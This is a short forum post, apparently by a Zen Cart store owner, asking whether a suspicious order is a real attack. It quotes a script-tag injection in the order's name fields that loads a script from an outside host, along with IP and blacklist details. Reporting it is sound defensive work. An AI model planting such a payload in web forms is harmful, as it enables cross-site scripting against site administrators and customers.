We have had one instance in a recent customer order of this string appearing in the customer and shipping address name fields:
"<script src=//a6x.me/s/3˃˂/script˃". Searching the Web I can find only one other occurrence of this at
https://elitecollegepapers.blog/i-wa...other/03/2024/
It looks like that site may also be using Zencart.
The IPAddress of a6x.me is 172.67.135.15 and the IPAddress the order was made from is 149.28.252.158
Both addresses are blacklisted on seven servers listed at multirbl.valli.org.
Any idea if this is a real hacking attempt that could compromise a ZenCart database or just some twerp goofing around?
Would be grateful for advice.
Bookmarks